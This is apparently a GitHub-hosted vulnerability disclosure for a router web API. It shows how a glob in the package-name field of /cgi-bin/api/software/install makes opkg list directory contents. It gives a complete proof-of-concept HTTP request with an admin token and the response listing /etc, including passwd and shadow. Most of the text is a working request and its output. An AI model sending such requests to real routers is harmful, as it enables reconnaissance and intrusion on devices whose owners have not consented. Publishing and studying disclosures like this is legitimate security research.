Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
Latest commit f0c9c0a May 9, 2023 History
0 contributors

Users who have contributed to this file

executable file 39 lines (29 sloc) 5.09 KB

Directory Listing

Through the software installation feature, it is possible to inject arbitrary parameters in the request so as to exploit opkg to get the list of files in a specific directory, using the regex feature in package name.

Proof of Concept:

Request:

POST /cgi-bin/api/software/install HTTP/1.1
Host: 192.168.8.1
Content-Length: 11
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: ce0fc001ff684088a83257360de4bb44
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.8.1
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=ce0fc001ff684088a83257360de4bb44
Connection: close

name=/etc/*

Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 8221
Connection: close
Date: Sun, 19 Mar 2023 08:31:23 GMT
Server: lighttpd/1.4.48

{"code":-13,"stderr":"Collected errors:\n * opkg_install_cmd: Cannot install package \/etc\/TZ.\n * opkg_install_cmd: Cannot install package \/etc\/Visible_profile.\n * opkg_install_cmd: Cannot install package \/etc\/banner.\n * opkg_install_cmd: Cannot install package \/etc\/banner.failsafe.\n * opkg_install_cmd: Cannot install package \/etc\/board.d.\n * opkg_install_cmd: Cannot install package \/etc\/board.json.\n * opkg_install_cmd: Cannot install package \/etc\/chatscripts.\n * opkg_install_cmd: Cannot install package \/etc\/config.\n * opkg_install_cmd: Cannot install package \/etc\/crontabs.\n * opkg_install_cmd: Cannot install package \/etc\/ddns.\n * opkg_install_cmd: Cannot install package \/etc\/device_info.\n * opkg_install_cmd: Cannot install package \/etc\/diag.sh.\n * opkg_install_cmd: Cannot install package \/etc\/dnsmasq.conf.\n * opkg_install_cmd: Cannot install package \/etc\/dropbear.\n * opkg_install_cmd: Cannot install package \/etc\/ethers.\n * opkg_install_cmd: Cannot install package \/etc\/ethertypes.\n * opkg_install_cmd: Cannot install package \/etc\/filesystems.\n * opkg_install_cmd: Cannot install package \/etc\/firewall.nat6.\n * opkg_install_cmd: Cannot install package \/etc\/firewall.user.\n * opkg_install_cmd: Cannot install package \/etc\/forward.\n * opkg_install_cmd: Cannot install package \/etc\/fstab.\n * opkg_install_cmd: Cannot install package \/etc\/fw_env.config.\n * opkg_install_cmd: Cannot install package \/etc\/gcom.\n * opkg_install_cmd: Cannot install package \/etc\/glversion.\n * opkg_install_cmd: Cannot install package \/etc\/group.\n * opkg_install_cmd: Cannot install package \/etc\/hosts.\n * opkg_install_cmd: Cannot install package \/etc\/hotplug-preinit.json.\n * opkg_install_cmd: Cannot install package \/etc\/hotplug.d.\n * opkg_install_cmd: Cannot install package \/etc\/hotplug.json.\n * opkg_install_cmd: Cannot install package \/etc\/init.d.\n * opkg_install_cmd: Cannot install package \/etc\/inittab.\n * opkg_install_cmd: Cannot install package \/etc\/ip-up.d.\n * opkg_install_cmd: Cannot install package \/etc\/iproute2.\n * opkg_install_cmd: Cannot install package \/etc\/lighttpd.\n * opkg_install_cmd: Cannot install package \/etc\/localtime.\n * opkg_install_cmd: Cannot install package \/etc\/lockdown.\n * opkg_install_cmd: Cannot install package \/etc\/log.\n * opkg_install_cmd: Cannot install package \/etc\/modules-boot.d.\n * opkg_install_cmd: Cannot install package \/etc\/modules.d.\n * opkg_install_cmd: Cannot install package \/etc\/mtab.\n * opkg_install_cmd: Cannot install package \/etc\/mwan3.user.\n * opkg_install_cmd: Cannot install package \/etc\/nodogsplash.\n * opkg_install_cmd: Cannot install package \/etc\/openvpn.\n * opkg_install_cmd: Cannot install package \/etc\/openvpn.user.\n * opkg_install_cmd: Cannot install package \/etc\/openwrt_release.\n * opkg_install_cmd: Cannot install package \/etc\/openwrt_version.\n * opkg_install_cmd: Cannot install package \/etc\/opkg.\n * opkg_install_cmd: Cannot install package \/etc\/opkg.conf.\n * opkg_install_cmd: Cannot install package \/etc\/os-release.\n * opkg_install_cmd: Cannot install package \/etc\/passwd.\n * opkg_install_cmd: Cannot install package \/etc\/passwd-.\n * opkg_install_cmd: Cannot install package \/etc\/ppp.\n * opkg_install_cmd: Cannot install package \/etc\/preinit.\n * opkg_install_cmd: Cannot install package \/etc\/profile.\n * opkg_install_cmd: Cannot install package \/etc\/protocols.\n * opkg_install_cmd: Cannot install package \/etc\/rc.button.\n * opkg_install_cmd: Cannot install package \/etc\/rc.common.\n * opkg_install_cmd: Cannot install package \/etc\/rc.d.\n * opkg_install_cmd: Cannot install package \/etc\/rc.local.\n * opkg_install_cmd: Cannot install package \/etc\/resolv.conf.\n * opkg_install_cmd: Cannot install package \/etc\/route_policy.\n * opkg_install_cmd: Cannot install package \/etc\/samba.\n * opkg_install_cmd: Cannot install package \/etc\/services.\n * opkg_install_cmd: Cannot install package \/etc\/shadow.\n * opkg_install_cmd: Cannot install package \/etc\/shadow-.\n * "}